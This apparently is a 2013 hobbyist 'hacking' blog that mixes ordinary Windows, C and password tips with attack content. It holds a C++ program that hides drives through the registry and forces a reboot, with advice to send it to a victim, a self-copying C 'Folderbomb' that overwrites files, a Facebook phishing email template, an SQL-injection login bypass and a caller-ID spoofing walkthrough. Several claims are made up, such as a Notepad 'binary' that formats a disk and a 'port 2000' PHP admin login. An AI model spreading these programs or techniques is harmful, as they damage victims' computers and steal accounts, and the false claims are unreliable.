Expert Hacker:-Bishal obory

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Monday, December 23, 2013

C Program Header Files..

C Program Header Files..
1. <stdio.h>: input and
output function in
program.
2. <conio.h>: to clear
screen and pause
information function.
3. <ctype.h>: function for
testing characters
4. <string.h>: function
for manipulating string
5. <math.h>:
mathmatical function
6. <stdlib.h>: utility
function for number,
conversion, storage
allocation
7. <assert.h>: function
that can beused to add
diagnostics to a program
8. <stdarg.h>: function
that can be used to step
through a list of function
arguments
9. <setjmp.h>: function
that can be used to avoid
the normal call and
return sequence

10. <signal.h>: function
for handling exceptional
condition that may arise
in a program
11. <time.h>: function for
manipulating date and
time
12. <limits.h>: constant
definitions for the size of
C data types
13. <float.h>: definitions
relating to floating-point
arithmetic..


Maximum RAM that your OS can support :

Maximum RAM that your OS can support :
Maximum RAM that your OS can support :

Windows 8 64 bit Enterprise,Professional : 512
GB
Windows 8 64 bit :128 GB
Windows 8 32 bit : 4 GB
Windows 7 64 bit Ultimate, Enterprise
& Professional :192 GB Windows 7 64
bit Home Premium:16 GB
Windows 7 64 bit Home Basic : 8 GB
Windows 7 32 bit (all editions except Starter) :4
GB
Windows 7 32 bit Starter : 2 GB
Windows Vista 64 bit Ultimate,
Enterprise & Business: 128 GB
Windows Vista 64 bit Home Premium :16GB
Windows Vista 64 bit Home Basic : 8GB
Windows Vista 32 bit (all editions except
Starter) : 4 GB
Windows 7 32 bit Starter :1 GB
Windows XP 64 bit : 128 GB
Windows XP 32 bit : 4 GB
Mac OS X 64 bit :96 GB
Linux 64 bit :1 TB
Linux 32 bit :4 GB
Linux 32 bit (with PAE) :64 GB



C program to shutdown windows7 :

C program to shutdown windows7 :

# include <stdio.h>
# include <stdlib.h>
main ()
{
char ch ;
printf ("Do you want to shutdown your computer now (y/n) \n ") ;
scanf ( "%c" ,& ch ) ;
if ( ch == 'y' || ch == 'Y' )
system ( "C: \\ WINDOWS\\ System32 \\ shutdown /s" ) ;
return 0 ;
}


Access your phone without simcard

Access your phone without simcard
.
.
.
Access Ur Cell Phone menu without Sim card
To access to the menu in your phone without
having a card inside do the
following: type **04*0000*0000*0000# When
display say "Wrong Pin" press NO and
you have access to the all menus: Info, Access,
Settings, Calculator, Clock,
Keylock On?, Mail, Phone book
Do give a little thanks if u like the trick


How To Make Nameless Folder

How To Make Nameless Folder

Before attempting this trick, try to make a
folder with no name and you will fail to do so.
This is what this trick will let you do. Below is
screenshot of folder before and after doing this
interesting trick.
creating nameless folder
Make a Newfolder on desktop or where ever
you want.
Right click on this newly created folder and
select Rename.
Erase the text showing "New Folder".
Now keep Pressing Alt (i.e alter key) and type
255. If you are on laptop then you need to
enable your Num Lock and type from the
highlighted number keys not from those below
function keys.
After that leave alt key and Press enter.
Done you just created nameless folder.

Wednesday, November 13, 2013

How to Hack A Facebook Account

 How to Hack A Facebook Account

 And How To Protect yourself From Hackers

Please take note that this is for educational purposes only and
not to be used as a means to scam or attack other facebook
users.  The reason I am sharing this is because I want you to be
aware that your FB account can be hacked and how you can
protect yourself from it.  Also, there are so many fake so-called
“hacking tools” that are actually coded to appear as if it is
attacking and retrieving facebook passwords from an email you
provide.  But in reality, it is impossible to hack facebook
directly.  Meaning a simple visual basic program (usually used by
wanna be hackers) cannot, in any way, penetrate the highly
secured database of facebook.  I can easily write those fake
programs in less than 2 minutes and it would appear to be real
but is only doing some visual effects to let the user believe it is
hacking facebook.

There are other ways however that a facebook account may be
hacked, and your account is no exception.  This includes some
clever program that retrieves all passwords and emails from a
specific computer.  This kind of program is most effective when
used in public computer shops like public internet cafes or
public libraries and similar places. You simple run the program
and it retrieves all files logged in to facebook.  

That why it is most advised to avoid using your facebook account
especially in public places where one computer is used by
several persons in one day.  If you really feel the need to open
your account in such places, make sure to run a keylogger
detector program.  Then you must always clear the browser
cookies before logging in and after logging in to your facebook
account.

You can download a sample program here

Keylogger Detector program (small file that you can upload to your

email and download it whenever you need to use it in a public internet café or public library)

Aside from protecting your FB account, keylogger also protects
all your email login details.  Not to mention your login info to
your favorite online games

The other trick to hack a facebook account is through the use of
a fake login page.  Here is a sample email that you might
receive from a hacker:

Body: 
Dear facebook user (victim's facebook user name), 
Recently we saw some suspicious activity on your account, we  
suspect it as a malicious script. As a valuable user to us we  
understand   this   might   be   system   error,   if   the   activity   is   not  
generated by you then please log-in to your account by followin                 
link, 
<link to fake login site> 
Failing to log-in within next 48 hours Facebook holds right to  
suspend your account for sake of privacy of you and others. By  
lo   ing in you'll confirm it is system error and we will fix it in no  
time. Your inconvenience is regretted. Thank you. 

support@facebook.com,  
Facebook, Inc, 
1601 S.California Ave 
Palo Alto CA 94394 
US 

So in this email, a person that is not security conscious might  
quickly click on the link and login.  Unfortunately, the login link  
is not facebook.com/login.php but some other website.  That  
login details are then stored and your account compromised. 

An even trickier strategy is to share some scandal video on the  
wall that creates intrigue to friends, so convincing that they  
need to see that particular scandal.  The video however is only  
viewable upon share.  So when you are asked to log-in so that  
you can share the video, you are instead logging into a fake  

page that looks exactly like facebook interface and thus your log  
in details in the hands of the hacker. 

Download a sample script of this hacking program  
here 

So as a lesson, always make sure to check the browser bar  
whenever you are asked to login to your facebook account.  If  
the browser bar is not FACEBOOK.COM/LOGIN.PHP and some  
other site like OTHERSITE.COM/LOGIN.PHP, NEVER EVER login!  
So that your account details and your facebook account will not  
be hacked. 




Thursday, November 7, 2013

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Wednesday, October 16, 2013

Tips for creating strong passwords and passphrases


 
    Tips for creating strong passwords and passphrases

A password is a string of characters used to access information or a computer. Passphrases are typically longer than passwords, for added security, and contain multiple words that create a phrase. Passwords and passphrases help prevent unauthorized people from accessing files, programs, and other resources. When you create a password or passphrase, you should make it strong, which means it's difficult to guess or crack. It's a good idea to use strong passwords on all user accounts on your computer. If you're using a workplace network, your network administrator might require you to use a strong password.


Note

•In wireless networking, a Wi Fi Protected Access (WPA) security key supports the use of a passphrase. This passphrase is converted into a key that is used for encryption, which is not visible to you. For more information about WPA security keys, see What are the different wireless network security methods?

What makes a password or passphrase strong?


A strong password:


Is at least eight characters long.
Does not contain your user name, real name, or company name.
Does not contain a complete word.
Is significantly different from previous passwords.
Is 20 to 30 characters long.


A strong passphrase:


Is a series of words that create a phrase.
Does not contain common phrases found in literature or music.
Does not contain words found in the dictionary.
Does not contain your user name, real name, or company name.
Is significantly different from previous passwords or passphrases.


Strong passwords and passphrases contain characters from each of the following four categories:

Character category         Examples

                       
Uppercase letters A, B, C
Lowercase letters a, b, c
Numbers                0, 1, 2, 3, 4, 5, 6, 7, 8, 9


Symbols found on the keyboard (all keyboard characters not defined as letters or numerals) and spaces
EXAMPLE:- ` ~ ! @ # $ % ^ & * ( ) _ - + = { } [ ] \ | : ; " ' < > , . ? /

A password or passphrase might meet all the criteria above and still be weak. For example, Hello2U! meets all the criteria for a strong password listed above, but is still weak because it contains a complete word. H3ll0 2 U! is a stronger alternative because it replaces some of the letters in the complete word with numbers and also includes spaces.

Help yourself remember your strong password or passphrase by following these tips:

•Create an acronym from an easy-to-remember piece of information. For example, pick a phrase that is meaningful to you, such as My son's birthday is 12 December, 2004. Using that phrase as your guide, you might use Msbi12/Dec,4 for your password.

•Substitute numbers, symbols, and misspellings for letters or words in an easy-to-remember phrase. For example, My son's birthday is 12 December, 2004 could become Mi$un's Brthd8iz 12124, which would make a good passphrase.

•Relate your password or passphrase to a favorite hobby or sport. For example, I love to play badminton could become ILuv2PlayB@dm1nt()n.


 If you feel you must write down your password or passphrase to remember it, make sure you don't label it as such, and keep it in a safe place.

   Creating stronger passwords and passphrases using ASCII characters


You can also create passwords and passphrases that use extended ASCII characters. Using extended ASCII characters helps make your password or passphrase more secure by increasing the number of characters you can choose from to make it strong. Before using extended ASCII characters, make sure that passwords and passphrases containing them are compatible with the programs that are used by you or your workplace. Be especially cautious about using extended ASCII characters in passwords and passphrases if your workplace uses several different operating systems or versions of Windows.

You can find extended ASCII characters in Character Map. Some extended ASCII characters should not be used in passwords and passphrases. Do not use a character if a keystroke is not defined for it in the lower-right corner of the Character Map dialog box. For more information, see Using special characters (Character Map): frequently asked questions.

Windows passwords can be much longer than the eight characters recommended above. In fact, you can make a password up to 127 characters long. However, if you are on a network that also has computers running Windows 95 or Windows 98, consider using a password that is no longer than 14 characters. If your password is longer than 14 characters, you might not be able to log on to your network from computers running those operating systems.



Saturday, August 24, 2013

Advance Google Search Tricks

                                                            Advance Google Search Tricks

You often find it hard sometimes when you are serching your book,mp3 song,videos but not now, now in this tutorial I will show you how to find exact what you want with a software devolped to make search easy and effective.
A software named as Google Hacks has the ability to reduce your searching efforts.

Google Hacks is a compact utility that will allow its users to search google using different google search hacks.

Using Google Hacks one can easily do a music search by using a highly optimized and complex search command that can be obtained just by clicking a number of option boxes that can be found in the program's interface.

Here is a demonstration of this tool here I want to search a video which is having name ?hacking videos by Bishal Ob Roy? and it would be in any format l.ike .mpg,.avi,.wmv,.divx,.flv and when I click search then.

Here I got all the hacking videos related to Bishal Ob Roy.So with this you can search anything having 99% accuracy in serching the desired contents. You can download this software free from this link:- http://www.bishalhackingguru.blogspot.com/GoogleHacksSetup1.6.zip.

Bishal Ob Roy?s Suggesion:- “ I personally recommend this software for every one from 10th class student to PHD pursuing people. Because with this help to can search 90% better than the simple search as you do on google.”

Access Orkut in a Blocked Network

                                                             Access Orkut in a Blocked Network
As you know I am student of T.P.COLLEGE MADHEPURA, BIHAR and LPU is always in mood to restrict students from surfing social websites like Facebook and orkut. So from past four years they were trying hard to make it happen . So here are some firewalls they have used
1.Nebero
 2.Websense
3.GFI-Moniter
4.Cyberom
So in this article I will show you how to access orkut,Facebook or anyother website which is restricted by your school,,college and university.

Orkut
Orkut is the most visited website in Brazil and second most visited site in India. Stats till May 2008, 53.86% of Orkut‘s users are from Brazil, followed by India with 16.97% and 23.4% of the traffic comes from Brazil, followed by India with 18.0%. In 2008, more than 23 million of Brazilians had an account on orkut. Many Institutions and Companies blocked Orkut on their Network to increase productivity.

If you are one of Orkut addicted and dyeing to use Orkut at your workplace don‘t worry proxy server can help you.

Proxy server is a server that acts as a go-between for requests from clients seeking resources from other servers. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by
connecting to the relevant server and requesting the service on behalf of the client. Too complicated? okay read the solution.

Solution:- Download any one from listed proxy server and surf freely
1. VPNs (Virtual Private Networks) :


To start with, I will put VPNs in first place. Virtual Private Networks (VPNs) not only help you unblock myspace, bebo, friendster or orkut login, but also help you to remain maximum anonymous on web.

I have informed you about two VPNs:
 Itshidden.com and CyberGhost.com proxy software. I personally use Itshidden.com as my proxy server software as it is giving me good proxy speed. I have tried out Cyber Ghost even but Itshidden.com is much better than Cyber Ghost free proxy software.
2. Tor :
This is used on a large scale on internet to maintain online anonymity. This can also be used to get unblock proxy servers to unblock myspace, bebo, friendster, orkut login. Tor is a network of tunnels which allows users to maintain their privacy on internet. It is just same as VPNs.
3. Hotspot Shield :
I am really impressed with the speed of proxy servers it provides. It is one of the fastest proxy software I have seen. But, I am ranking it low because of its advertisements. Its free proxy server service shows you ads which is really annoying and you have to install addons like AdsBlockPlus to remove these ads. Otherwise, its the best proxy software.
4. Ultra surf (Bishal?s Choice)
If you are looking for free full version proxy software, which can provide you mostly US based proxy servers to unblock myspace, bebo, friendster or orkut login, then you should use Ultrasurf and surely you‘ll love it. It provides you with 3 proxy servers which are having good speed and it also displays the percentage of speed to help you choose best proxy server out of available 3 free proxy servers.

5. Hide my IP :
This proxy software was demanded to me by many readers and I received many emails after I posted an article on it. No doubt, Hide my IP is a good proxy software. But, it has its own drawback of trial version and you have to pay for using it for long time.

6. Hide Your IP Address :
This free proxy software not only provides you with free proxy servers, but also has useful proxy feature of Proxy Checker. You can adjust your level of anonymity and proxy server speed from setting tab of Hide Your IP address proxy software.
Bishal?s Suggesion: - “I use Ultra surf 9.2 best proxy server in the world can bypass any firewall in the world”


Saturday, July 27, 2013

Some Window 7 Cheats

Some Window 7 Cheats
As you all know Windows 7 RC3 is launched. Here‘s a little cheat sheet I made up for some of the handy new hot key combination, many of which I‘ve become quite dependent on!
From Desktop
1. Windows Key + Tab : Aero
2. Windows Key + E : Windows Explorer is launched.
3. Windows Key + R : Run Command is launched.
4. Windows Key + F : Search
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer
7. Windows Key + U : Launches Ease of Access
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows Right
17. Windows Key + # (# is any number)
18. Windows Key + = : Launches the Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop
From Windows Explorer
22. Alt + Up: Go up one level
23. Alt + Left/ Right: Back/ Forward
24. Alt + P: Show/hide Preview Pane
Taskbar modifiers
25. Shift + Click on icon: Open a new instance
26. Middle click on icon: Open a new instance
27. Ctrl + Shift + Click on icon: Open a new instance with Admin privileges
28. Shift + Right-click on icon: Show window menu
29. Shift + Right-click on grouped icon: Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon: Cycle between the windows (or tabs) in the group

BIshal Ob roy"s Suggesion: - “Though some of them are there in previous “versions of Windows, Windows 7 has incorporated many of them and have started many afresh.”


Protect Email Accounts From Spam

                                                   Protect Email Accounts From Spam

The following methods can be used to combat email spam.
1. Use spam filters for your email account. If you‘re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each Spam filter has it‘s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.
2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.
3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead signup for a dummy email account and use this for surveys and feedback forms.
4. While posting your contact email address on your website use this format: emailaddress [at] mysite.com instead of emailaddress@mysite.com. This protects your email address from being indexed by spam bots.
5. Do not respond to unknown messages. When you receive a unknown email, avoid forwarding it to your friends. Examples of unknown messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use  "Bcc"(blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded.
BIshal Ob roy"s Suggesion:-“Spam is the abuse of electronic messaging systems to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam”




MORE THEN ONE SITE PROVIDE FREE SMS

                                      MORE THEN ONE SITE PROVIDE FREE SMS
(1) Yahoo Messenger
You can download Yahoo messenger to it allows you to send free SMS in India, You can send SMS from your inbox too. When composing new message you choose a new mial message or Instant message or SMS to mobile.
(2) AOL Messenger
You can download AOL’s AIM messenger, it allows you to send free SMS in India. You can send SMS from your inbox too. This is such as yahoo.
(3) Rediff Bol
Rediff Bol also allows you to send free SMS.
(4) Goolge SMS Channel
Google SMS channel allows you to send free SMS, you have to create channel than you can send message to members of your channel.
(5) 160by2
160by2 is known for SMS sending because it is main service of 160by2. You can send 145 character SMS.
(6) Way2sms
Way2sms is also only for SMS sending, its all other services are related to sending SMS. You can create your email ID also youname@way2sms.
(7) Youmint
Youmint is also known for sending SMS, you can 80 characters message.
(8) Atrochatro
Atrochatro is also an SMS sending site.
(9) Mysmsindia
Mysmsindia is another SMS sending site.
(10) Indyrocks
Indyarocks is now social networking service and SMS feature is only a feature of Indyarocks but before it was known as SMS sending site. You can send 130 characters long SMS.
(11) Sendsmsnow
You can send free SMS in India and in other countries.
(12) Mycantos
You can send up to 300 characters long SMS, you can signup using Facebook.
(13) Site2sms
You can send 260 characters long SMS on any mobile in India. This is a popular site free sending SMS.
(14) Smsfi
It is more than SMS site. You will see forums, greetings, news, cricket, games and more.
(15) SMSze
It is a popular SMS sending site. You can send free SMS and trace mobile numbers. You can send group SMS and future SMS.
Last Update on 8 Feb, 2013.
Check ip
The famous five
(1) Whatismyipaddress
(2) Whatismyip
(3) IP-Adress
(4) Whatsmyip
(5) ipaddress
When you will find, a service knows this much, you would want to do something. People use proxy servers but it is unsafe until you go for a VPN (virtual private network).
If you have a WordPress blog, it shows the IP address of commentators.
We have two types of internet protocol addresses, ipv4 and ipv6. The format we are familiar with is ipv4 that has numeric number separated with periods (.), and ipv6 has alphanumeric number separated with colons (:).
BIshal Ob roy

   


                                               How Hacker‘s Hack Credit Card
A hacker has many ways to gain a credit card number from an innocent user. The most common one is known as phishing. In this technique, the hacker poses as an officer within an organization, let's say VISA. The hacker sends to a group of email accounts an alert, instructing the receiver to follow determined set of instructions before his credit card is cancelled. If the user is not aware of this kind of fraud, he will insert his credit card number, his name and expiration date without knowing he is going to be a victim of an online crime. Another way for hacking credit card numbers is through a website. The hacker only needs to hack the systems of an online retailer, let's say, Costco, and search for the database where the retailer stores the information of all of the users who have made recent transactions. The third way is through the online process of buying. Let's say an adult finds a website with adult content that he or she finds attractive. It's quite probable that the website is only a masquerade for acquiring credit card information from you.
What Is A Carder?
A carder is a criminal who specializes in stealing information from credit cards. Although the majority of them buy the information from online vendors, some of them are quite savvy on how to access that information by themselves. In the physical world, a carder will steal the information from a user while doing a face to face transaction. The criminal only needs to pass the card through a special scanner. This device will
80
read from the magnetic strip all of the credit card information. Afterwards, the carder will trespass that information to a blank card available in many identity card stores. In the virtual world, credit card hacking is a bit more sophisticated and automatized. A hacker could install inside your system a credit card hacking software known as Bugbear. This program is a keystroke logger; it captures the keys that you have pressed in your keyboard and after some time, it transmits this information to the hacker. The criminal will navigate through this data, searching for any private information that can give him access to your credit card. Besides Bugbear, there is also the IRC bot. This automated software is used for determined functions, like a moderator for a chat room. But if it is used by a hacker, he may use it for stealing your credit card information. The IRC bot will pose as an official from a company, asking you to insert your credit card information. Another mean that hackers use for stealing money from your credit card is through unused ebay accounts. Once they find a possible victim, the hacker uses a program that starts bombarding the account until it breaks it. Once inside, the hacker will use it for posing as the real user, selling equipment that will never reach the buyer once he buys it.
The URL in this case would be having website address like www.icicibank.ripway.com instead of www.icicibank.co.in.
BIshal Ob roy"s Suggesion:- “ There is only way to secue your credit cards and bank accounts from the hackers is that to have a eagle eye on the URL before putting your password and important details”


Hacking PHP Site In Less Than A Minute

                                         

                                         Hacking PHP Site In Less Than A Minute

In the mean time,here is how you can start -
 Step 1 – Search for them Make Google Search to find sites running Apache and PHP 4.4.
 Step 2 – Scan them Start by scanning them using Nmap or any other tool,Scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login. Now just login using port 2000 ie - http://www.website.com:2000 and you will be comfortably login into admin page like this -
 Step 3 – Hack them
Now in the fields, you have to type - username – admin password – a‘ or 1=1 or =b domain - a‘ or 1=1 or =b and press go,you will login into admin You have hacked into admin.
Bishal Ob Roy?s Suggesion “Sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 43 seconds”

Hack To Change Your IP Address

                                    Hack To Change Your IP Address
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.
63
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address With a little practice, you can easily get this process down to 15 seconds.
BIshal Ob roy"s Suggesion :- “This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.”

Format Hard Disk With Notepad

                                                       Format Hard Disk With Notepad
Notepad is a basic text editor you can use for simple documents or for creating Web pages. To create or edit files that require formatting, use WordPad.
 To open Notepad, click Start, point to All Programs, point to Accessories, and then click Notepad.
 But now I will show you how you can create a dangerous script in binary language to format hard disk by just running it.
 First open the notepad as I shown above and type the below given binary value
1001011000111110010010101010101010000011111100000
Now save this as any desired name i like password breaker.exe ,because many people when received this start opening that without inspecting anything. Here is the virus ready to send, it will format c drive of your hard disk.
 BIshal Ob roy"s Suggesion: -“Do not use this hack to break law in your country. This is for just education purpose only to show how hacker creates such type of viruses and also do not test this hack on your own computer or office where critical data is stored”


Create Virus Code In C Language

                       Create Virus Code In C Language
It will create folder in a folder in a folder and so on run this on your own responsibility*/
 #include
#include
 #include
 #include
 #include
 void main(int argc,char* argv[])
 { char buf[512];
 int source,target,byt,done;
 struct ffblk ffblk;
clrscr();
textcolor(2);
 cprintf(?————————————————————————–?);
 printf(?\nVirus: Folderbomb 1.0\nProgrammer:BAS
Unnikrishnan(asystem0@gmail.com)\n?);
 cprintf(?————————————————————————–?);
done = findfirst(?*.*?,&ffblk,0);
while (!done) { printf(?\n?);
cprintf(? %s ?, ffblk.ff_name);
printf(?is attacked by ?);
cprintf(?Folderbomb?);
source=open(argv[0],O_RDONLY|O_BINARY);
 target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1) {byt=read(source,buf,512);
 if(byt>0) write(target,buf,byt);
else break;
} close(source);
 close(target);
done = findnext(&ffblk);
} getch();
}
Bishal Ob Roy"s Suggestion: - “Well I did not try this virus by my self, so try this and give me your feedback. But still I do not recommend to use this virus for bad purpose”

                                        Call Your Friend With His Number
Last year in March, early morning I got a miscall, and when I see the number I was shocked to see that the number which was displaying on screen is my own number. Quickly i contact customer care and again after taking at least 23 minutes they replied ?Sorry Sir it is impossible to get any call from your own number?.
Then finally I open my laptop and start searching that how can it be possible to get a call from own number, after a while I come to learn that it is possible. A website can help you to do this, here is the full tutorial how it can be done.
1. Go to http://www.mobivox.com and register there for free account.
 2. During registration, remember to insert Victim mobile number in "Phone number" field.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct Web Call".
4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number (you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
 5. Bingo!! That‘s It Now Your Friend Will Shocked To see his/her number displaying on their screen.
Bishal Ob Roy"s Suggesion: - Well It can happen to anyone. The worst thing is that the Network Companies have no clue about this, so now if you get any type of call displaying your own number then don?t panic.

Thursday, July 25, 2013

Hack To Set wallpaper In Pen Drive

                                     Hack To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background


For that you need the following code:-
 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=hack.bmp IconArea_Text=0×00000000 Copy and paste it in a notepad file, and specify the image file name (here it is hack.bmp), then save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.
 Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper.
Bishal Ob Roy‟s Suggesion: - “I suggest to hide desktop.ini after creation this will help to you hide your code so that no one can see how this was done.”



Hack P4 To Make Core2Dual Processor

                                              Hack P4 To Make Core2Dual Processor

 Note, this trick is really not recommended as this may cause windows to provide falsified information to it self and other applications, which would cause system stability issue and may slow down the system….

How to Change the Processor Name shown in the System properties Dialog Box ??

Under Windows XP, Click Start, then RUN Command

―regedit―… (Without the quote symbols)… Now please navigate your self to this Registry location, >HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR > GO TO 0 Now please double click, on the key PROCESSORNAMESTRING . Change the value as you like........

Here you can see I changed my processor to 8.0GHz. So go and showoff to your friends that you have 8Ghz processor he he.

Bishal Ob Roy‟s Suggestion:- “Using this hack can lead in unexpected error in windows functionality so use this hack on your risk”